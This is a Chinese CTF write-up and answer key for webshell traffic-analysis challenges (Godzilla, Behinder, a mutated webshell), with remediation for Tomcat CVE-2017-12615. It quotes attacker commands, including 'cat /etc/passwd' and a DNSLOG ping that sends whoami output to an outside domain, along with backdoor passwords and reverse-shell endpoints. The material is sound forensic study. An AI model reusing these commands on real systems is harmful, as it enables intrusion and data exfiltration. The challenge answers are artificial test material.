玄机平台 流量分析题目合集WP
字数 2737 2025-09-01 11:26:03
玄机平台流量分析题目解析与教学文档
一、哥斯拉4.0流量分析
1. 黑客入侵信息
- 黑客IP:
192.168.31.190 - 利用漏洞: CVE-2017-12615 (Tomcat任意文件写入漏洞)
- 木马文件:
hello.jsp - 连接密码:
7f0e6f - 解密密钥:
1710acba6220f62b
2. 黑客操作分析
- 第一条命令:
uname -r(查看内核版本) - 当前shell权限: root权限
- 系统发行版本:
Debian GNU/Linux 10 (buster) - 过滤查询命令:
dpkg -l libpam-modules:amd64
3. 后门信息
- 反连IP和PORT:
192.168.31.143:1313 - 后门文件:
/tmp/pam_unix.so - 后门密码:
XJ@123 - DNSLOG服务器:
c0ee2ad2d8.ipv6.xxx.eu.org.
4. 分析技巧
- 使用Wireshark追踪TCP流(流31、46、47、48、51、52、56)
- 解密流量时注意删除头尾各16个字符
- 可使用蓝队工具箱辅助分析
二、哥斯拉ekp版本流量分析
1. 木马信息
- 文件名:
.index.jsp - 连接密码:
mypass - 连接密钥:
9adbe0b3033881f8 - 回显参数:
Rec106e_config
2. 黑客操作
- 第一条命令:
cat /etc/passwd - 反连IP和PORT:
192.168.31.205,4444 - 反连第一条命令:
ls - 新增后门账号: 用户名
x,密码Xj@666.
3. 后门配置
- 后门文件:
/etc/hosts.allow - SSH公钥: 需检查
/etc/ssh/sshd_config并计算MD5
4. 代理分析
- 代理类型:
suo5 - 代理路径:
/connect - 连接密码MD5:
e3c77fd790af8d25fe271cd275eb405e
5. 端口扫描
- 扫描IP和端口:
127.0.0.1,873,3306,80,8080,81,8081,21,22,88,8088,8888,1433,443,445,3389,222 - 开放端口:
222,8081
三、冰蝎3.0-jsp流量分析
1. 基本信息
- 黑客IP:
192.168.31.61 - Webshell名:
indeX.jsp - 解密key:
3f0af7bb4dbcfbd7
2. 黑客操作
- 第一条命令:
ifconfig - 上传文件内容:
ZmxhZ3s0ODUzNzViN2IwNmFkODU2YTc4OGMwZDk1MjI5ZjM1Y30=(Base64解码后为flag{485375b7b06ad856a788c0d95229f35c}) - 下载文件内容:
3aacab9ca36a6894c75048e4faf47052
3. 服务器flag
- flag位置:
/root目录下 - flag值:
ae1d04dd3d15c6a18f904fe50fdf7eca
四、某变异Webshell流量分析
1. 木马信息
- 文件名:
hello.jsp - 连接密码:
SjIHRC7oSVIE - 通信key:
oszXCfTeXHpIkMS3
2. 黑客操作
- 第一条命令:
ping -c 1whoami.d5454c8975.ipv6.1433.eu.org. - 回显方式: DNSLOG回显(
d5454c8975.ipv6.1433.eu.org.) - 反连IP和PORT:
192.168.31.190|2024 - 反连第一条命令:
ls
3. 后门分析
- 后门连接主机:
10.10.13.37|4444 - 加密文件解密: 使用AES-CBC模式,IV为文件前16个可见字符
4. 漏洞修复
- 漏洞原因: Tomcat启用了HTTP PUT请求方法且readonly参数设置为false
- 修复方法:
- 修改
/opt/apache-tomcat-8.5.19/conf/web.xml - 将
org.apache.catalina.servlets.DefaultServlet的readonly设为True - 或直接删除该配置(默认为true)
- 修改
- 验证修复: 运行
/root/check_tomcat得到flagba5579c780bf4a799e03a60c6be383e9
五、代理工具特征分析
| 工具 | 协议层特征 | 加密特征 | 行为特征 |
|---|---|---|---|
| FRP | 固定头部标识,版本明文 | TLS可选,指纹固定 | 长连接+固定心跳 |
| Stowaway | SOCKS5扩展标记,多级转发标识 | AES密钥交换暴露特征 | 高频短连接+规律端口切换 |
| Suo5 | HTTP分块传输,动态请求头 | 异或加密+动态TLS指纹 | 随机化延迟+反向代理融合 |
六、分析技巧总结
-
流量解密:
- 哥斯拉流量通常需要删除头尾各16个字符
- 冰蝎流量使用固定密钥解密
- 变异Webshell可能使用AES-CBC模式
-
后门查找:
- 检查
/tmp目录常见后门文件 - 查看
/etc/ssh/sshd_config配置变更 - 检查
/etc/hosts.allow文件修改
- 检查
-
漏洞利用:
- CVE-2017-12615利用Tomcat PUT方法漏洞
- 修复方法为禁用PUT方法或设置readonly=true
-
代理识别:
- 通过User-Agent变化识别suo5代理
- 分析HTTP路径和连接密码特征
-
加密文件解密:
- 确定加密算法(AES-CBC常见)
- 查找IV(通常是文件前16字节)
- 通过逆向分析获取密钥生成逻辑